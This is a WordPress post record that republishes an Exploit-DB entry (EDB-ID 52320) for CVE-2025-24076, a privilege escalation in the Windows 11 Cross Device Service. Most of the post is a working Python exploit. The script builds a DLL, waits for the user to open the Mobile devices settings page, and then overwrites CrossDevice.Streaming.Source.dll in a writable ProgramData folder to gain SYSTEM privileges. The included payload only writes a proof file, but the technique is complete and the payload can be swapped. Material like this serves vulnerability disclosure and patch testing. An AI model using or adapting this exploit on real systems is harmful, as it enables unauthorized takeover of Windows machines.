{"id":6749,"date":"2025-06-11T09:37:11","date_gmt":"2025-06-11T09:37:11","guid":{"rendered":"http:\/\/localhost\/?p=6749"},"modified":"2025-06-11T09:37:11","modified_gmt":"2025-06-11T09:37:11","slug":"microsoft-windows-11-version-24h2-cross-device-service-elevation-of-privilege","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=6749","title":{"rendered":"Microsoft Windows 11 Version 24H2 Cross Device Service &#8211; Elevation of Privilege"},"content":{"rendered":"<h2>Exploit Details<\/h2>\n<h3>Basic Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit Title<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">Microsoft Windows 11 Version 24H2 Cross Device Service &#8211; Elevation of Privilege<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit ID<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">EDB-ID:52320<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Type<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">exploitdb<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Published<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-06-09T00:00:00<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Modified<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-06-09T00:00:00<\/td>\n<\/tr>\n<\/table>\n<h3>CVSS Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">CVSS Score<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">7.3<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Severity<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd; color: #ff4444; font-weight: bold;\">HIGH<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Vector<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">CVSS:3.1\/AV:L\/AC:L\/PR:L\/UI:R\/S:U\/C:H\/I:H\/A:H<\/td>\n<\/tr>\n<\/table>\n<h3>CVE Information<\/h3>\n<div style=\" padding: 15px; border: 1px solid #ddd; margin-bottom: 20px;\">\n<ul style=\"margin: 0; padding-left: 20px;\">\n<li>CVE-2025-24076<\/li>\n<\/ul>\n<\/div>\n<h3>Exploit Description<\/h3>\n<div style=\" padding: 15px; border-left: 4px solid #4CAF50; margin-bottom: 20px;\">\n!\/usr\/bin\/env python3 Exploit Title: Microsoft Windows 11 Version 24H2 Cross Device Service&#8230;\n<\/div>\n<h3>Exploit Code<\/h3>\n<div style=\" color: #d4d4d4; padding: 15px; border: 1px solid #ddd; margin-bottom: 20px; font-family: 'Courier New', monospace; white-space: pre-wrap; overflow-x: auto;\">\n#!\/usr\/bin\/env python3<br \/>\n<br \/># Exploit Title: Microsoft Windows 11 Version 24H2 Cross Device Service &#8211; Elevation of Privilege<br \/>\n<br \/># Author: Mohammed Idrees Banyamer<br \/>\n<br \/># Instagram: @banyamer_security<br \/>\n<br \/># GitHub: https:\/\/github.com\/mbanyamer<br \/>\n<br \/># Date: 2025-06-06<br \/>\n<br \/># Tested on: Windows 11 Version 24H2 for x64-based Systems (10.0.26100.3476)<br \/>\n<br \/># CVE: CVE-2025-24076<br \/>\n<br \/>#<br \/>\n<br \/># Affected Versions:<br \/>\n<br \/># &#8211; Windows 11 Version 24H2 (x64 and ARM64)<br \/>\n<br \/># &#8211; Windows 11 Version 23H2 (x64 and ARM64)<br \/>\n<br \/># &#8211; Windows 11 Version 22H2 (x64 and ARM64)<br \/>\n<br \/># &#8211; Windows Server 2025<br \/>\n<br \/># &#8211; Windows Server 2022 23H2 (Server Core installation)<br \/>\n<br \/>#<br \/>\n<br \/># Type: Elevation of Privilege<br \/>\n<br \/># Platform: Microsoft Windows<br \/>\n<br \/># Author Country: Jordan<br \/>\n<br \/># CVSS v3.1 Score: 7.3 (Important)<br \/>\n<br \/># Weakness: CWE-284: Improper Access Control<br \/>\n<br \/># Attack Vector: Local<br \/>\n<br \/># Privileges Required: Low<br \/>\n<br \/># User Interaction: Required<br \/>\n<br \/># Scope: Unchanged<br \/>\n<br \/># Confidentiality, Integrity, Availability Impact: High<br \/>\n<br \/># Exploit Code Maturity: Unproven<br \/>\n<br \/># Remediation Level: Official Fix<br \/>\n<br \/># Description:<br \/>\n<br \/># This vulnerability affects Microsoft Windows 11 (various versions including 24H2, 23H2, and 22H2)<br \/>\n<br \/># and Windows Server 2025. It targets improper access control in the Windows Cross Device Service,<br \/>\n<br \/># allowing a low-privileged local attacker to overwrite a critical DLL file (CrossDevice.Streaming.Source.dll)<br \/>\n<br \/># in a writable directory. After triggering user interaction by opening Windows &#8220;Mobile devices&#8221; Settings,<br \/>\n<br \/># the attacker can replace the DLL with a malicious version, leading to SYSTEM privilege escalation.<br \/>\n<br \/>#<br \/>\n<br \/># Steps of exploitation:<br \/>\n<br \/># 1. Verify the presence of the vulnerable DLL in the writable directory.<br \/>\n<br \/># 2. Build a malicious DLL that executes code with SYSTEM privileges upon loading.<br \/>\n<br \/># 3. Backup the original DLL to allow recovery.<br \/>\n<br \/># 4. Trigger the DLL load by instructing the user to open the &#8220;Mobile devices&#8221; Settings page.<br \/>\n<br \/># 5. Wait until the DLL is unlocked and replace it with the malicious DLL.<br \/>\n<br \/># 6. Achieve SYSTEM privileges when the system loads the malicious DLL.<br \/>\n<br \/>#<br \/>\n<br \/># This exploit requires low privileges and user interaction but has low attack complexity<br \/>\n<br \/># and results in high impact due to full privilege escalation.<br \/>\n<br \/>#<\/p>\n<p>import os<br \/>\n<br \/>import shutil<br \/>\n<br \/>import time<br \/>\n<br \/>from pathlib import Path<br \/>\n<br \/>import subprocess<\/p>\n<p># Target DLL name based on vulnerability research<br \/>\n<br \/>DLL_NAME = &#8220;CrossDevice.Streaming.Source.dll&#8221;<br \/>\n<br \/>TARGET_PATH = Path(&#8220;C:\/ProgramData\/CrossDevice&#8221;)<br \/>\n<br \/>MALICIOUS_DLL = Path(&#8220;malicious.dll&#8221;)<br \/>\n<br \/>BACKUP_ORIGINAL_DLL = Path(&#8220;original_backup.dll&#8221;)<\/p>\n<p># C source code for malicious DLL<br \/>\n<br \/>MALICIOUS_C_CODE = r&#8221;&#8217;<br \/>\n<br \/>#include <windows.h><br \/>\n<br \/>#include <stdio.h><\/p>\n<p>BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {<br \/>\n<br \/>    if (fdwReason == DLL_PROCESS_ATTACH) {<br \/>\n<br \/>        FILE *file = fopen(&#8220;C:\\\\poc_only_admin_can_write_to_c.txt&#8221;, &#8220;w&#8221;);<br \/>\n<br \/>        if (file) {<br \/>\n<br \/>            fputs(&#8220;Exploit succeeded! You have SYSTEM privileges.\\n&#8221;, file);<br \/>\n<br \/>            fclose(file);<br \/>\n<br \/>        }<br \/>\n<br \/>    }<br \/>\n<br \/>    return TRUE;<br \/>\n<br \/>}<br \/>\n<br \/>&#8221;&#8217;<\/p>\n<p>def build_malicious_dll():<br \/>\n<br \/>    print(&#8220;[*] Building malicious DLL from C source&#8230;&#8221;)<br \/>\n<br \/>    c_file = Path(&#8220;malicious.c&#8221;)<br \/>\n<br \/>    # Write C source code to file<br \/>\n<br \/>    with open(c_file, &#8220;w&#8221;) as f:<br \/>\n<br \/>        f.write(MALICIOUS_C_CODE)<br \/>\n<br \/>    # Compile DLL using gcc (MinGW)<br \/>\n<br \/>    compile_cmd = [<br \/>\n<br \/>        &#8220;gcc&#8221;, &#8220;-shared&#8221;, &#8220;-o&#8221;, str(MALICIOUS_DLL), str(c_file),<br \/>\n<br \/>        &#8220;-Wl,&#8211;subsystem,windows&#8221;<br \/>\n<br \/>    ]<br \/>\n<br \/>    try:<br \/>\n<br \/>        subprocess.run(compile_cmd, check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)<br \/>\n<br \/>        print(f&#8221;[+] Malicious DLL built successfully: {MALICIOUS_DLL}&#8221;)<br \/>\n<br \/>        # Clean up C source file<br \/>\n<br \/>        c_file.unlink()<br \/>\n<br \/>        return True<br \/>\n<br \/>    except subprocess.CalledProcessError as e:<br \/>\n<br \/>        print(&#8220;[!] Failed to build malicious DLL.&#8221;)<br \/>\n<br \/>        print(&#8220;gcc output:&#8221;, e.stderr.decode())<br \/>\n<br \/>        return False<\/p>\n<p>def is_vulnerable():<br \/>\n<br \/>    if not TARGET_PATH.exists():<br \/>\n<br \/>        print(&#8220;[!] Target directory not found.&#8221;)<br \/>\n<br \/>        return False<br \/>\n<br \/>    dll_path = TARGET_PATH \/ DLL_NAME<br \/>\n<br \/>    if not dll_path.exists():<br \/>\n<br \/>        print(&#8220;[!] Target DLL not found.&#8221;)<br \/>\n<br \/>        return False<br \/>\n<br \/>    print(&#8220;[+] System appears vulnerable, DLL found in a writable path.&#8221;)<br \/>\n<br \/>    return True<\/p>\n<p>def backup_original():<br \/>\n<br \/>    dll_path = TARGET_PATH \/ DLL_NAME<br \/>\n<br \/>    backup_path = TARGET_PATH \/ BACKUP_ORIGINAL_DLL<br \/>\n<br \/>    shutil.copyfile(dll_path, backup_path)<br \/>\n<br \/>    print(f&#8221;[+] Backup created at: {backup_path}&#8221;)<\/p>\n<p>def replace_with_malicious():<br \/>\n<br \/>    dll_path = TARGET_PATH \/ DLL_NAME<br \/>\n<br \/>    try:<br \/>\n<br \/>        shutil.copyfile(MALICIOUS_DLL, dll_path)<br \/>\n<br \/>        print(&#8220;[+] Successfully replaced the DLL with malicious version.&#8221;)<br \/>\n<br \/>        return True<br \/>\n<br \/>    except PermissionError:<br \/>\n<br \/>        print(&#8220;[!] Cannot write to DLL. Make sure the process using it is stopped.&#8221;)<br \/>\n<br \/>        return False<\/p>\n<p>def monitor_and_replace():<br \/>\n<br \/>    dll_path = TARGET_PATH \/ DLL_NAME<br \/>\n<br \/>    print(&#8220;[*] Monitoring DLL until it is unlocked&#8230;&#8221;)<br \/>\n<br \/>    while True:<br \/>\n<br \/>        try:<br \/>\n<br \/>            with open(dll_path, &#8216;rb+&#8217;) as f:<br \/>\n<br \/>                print(&#8220;[+] File is unlocked. Attempting replacement&#8230;&#8221;)<br \/>\n<br \/>                time.sleep(0.5)<br \/>\n<br \/>                return replace_with_malicious()<br \/>\n<br \/>        except PermissionError:<br \/>\n<br \/>            time.sleep(0.5)<\/p>\n<p>def trigger_com():<br \/>\n<br \/>    print(&#8220;[*] To trigger DLL load, please open Windows Settings -> Mobile devices&#8221;)<br \/>\n<br \/>    input(&#8220;[*] After opening Settings, press Enter to continue&#8230;&#8221;)<\/p>\n<p>def main():<br \/>\n<br \/>    if not build_malicious_dll():<br \/>\n<br \/>        return<br \/>\n<br \/>    if not is_vulnerable():<br \/>\n<br \/>        return<\/p>\n<p>    backup_original()<br \/>\n<br \/>    trigger_com()<\/p>\n<p>    success = monitor_and_replace()<br \/>\n<br \/>    if success:<br \/>\n<br \/>        print(&#8220;[\u2713] Exploit completed successfully. Check results (e.g., C:\\\\poc_only_admin_can_write_to_c.txt).&#8221;)<br \/>\n<br \/>    else:<br \/>\n<br \/>        print(&#8220;[\u2717] Exploit failed.&#8221;)<\/p>\n<p>if __name__ == &#8220;__main__&#8221;:<br \/>\n<br \/>    main()\n<\/div>\n<p><a href=\"https:\/\/www.exploit-db.com\/exploits\/52320\" target=\"_blank\" style=\"display: inline-block;  color: white; padding: 10px 20px; text-decoration: none; border-radius: 4px;\">View Full Exploit Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Exploit Details Basic Information Exploit Title Microsoft Windows 11 Version 24H2 Cross Device Service &#8211; Elevation of Privilege Exploit ID EDB-ID:52320 Type exploitdb Published 2025-06-09T00:00:00&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,47,12,40,15,13,7,11,5],"class_list":["post-6749","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-73","tag-exploit","tag-exploitdb","tag-high","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Microsoft Windows 11 Version 24H2 Cross Device Service - Elevation of Privilege - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=6749\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Microsoft Windows 11 Version 24H2 Cross Device Service - Elevation of Privilege - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Exploit Details Basic Information Exploit Title Microsoft Windows 11 Version 24H2 Cross Device Service &#8211; Elevation of Privilege Exploit ID EDB-ID:52320 Type exploitdb Published 2025-06-09T00:00:00...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=6749\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-06-11T09:37:11+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6749#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6749\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Microsoft Windows 11 Version 24H2 Cross Device Service &#8211; Elevation of Privilege\",\"datePublished\":\"2025-06-11T09:37:11+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6749\"},\"wordCount\":807,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.3\",\"exploit\",\"exploitdb\",\"HIGH\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=6749#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6749\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6749\",\"name\":\"Microsoft Windows 11 Version 24H2 Cross Device Service - Elevation of Privilege - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-06-11T09:37:11+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6749#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=6749\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6749#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Microsoft Windows 11 Version 24H2 Cross Device Service &#8211; Elevation of Privilege\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Microsoft Windows 11 Version 24H2 Cross Device Service - Elevation of Privilege - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=6749","og_locale":"en_US","og_type":"article","og_title":"Microsoft Windows 11 Version 24H2 Cross Device Service - Elevation of Privilege - zero redgem","og_description":"Exploit Details Basic Information Exploit Title Microsoft Windows 11 Version 24H2 Cross Device Service &#8211; Elevation of Privilege Exploit ID EDB-ID:52320 Type exploitdb Published 2025-06-09T00:00:00...","og_url":"https:\/\/zero.redgem.net\/?p=6749","og_site_name":"zero redgem","article_published_time":"2025-06-11T09:37:11+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=6749#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=6749"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Microsoft Windows 11 Version 24H2 Cross Device Service &#8211; Elevation of Privilege","datePublished":"2025-06-11T09:37:11+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=6749"},"wordCount":807,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.3","exploit","exploitdb","HIGH","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=6749#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=6749","url":"https:\/\/zero.redgem.net\/?p=6749","name":"Microsoft Windows 11 Version 24H2 Cross Device Service - Elevation of Privilege - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-06-11T09:37:11+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=6749#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=6749"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=6749#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Microsoft Windows 11 Version 24H2 Cross Device Service &#8211; Elevation of Privilege"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/6749","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6749"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/6749\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6749"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6749"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6749"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}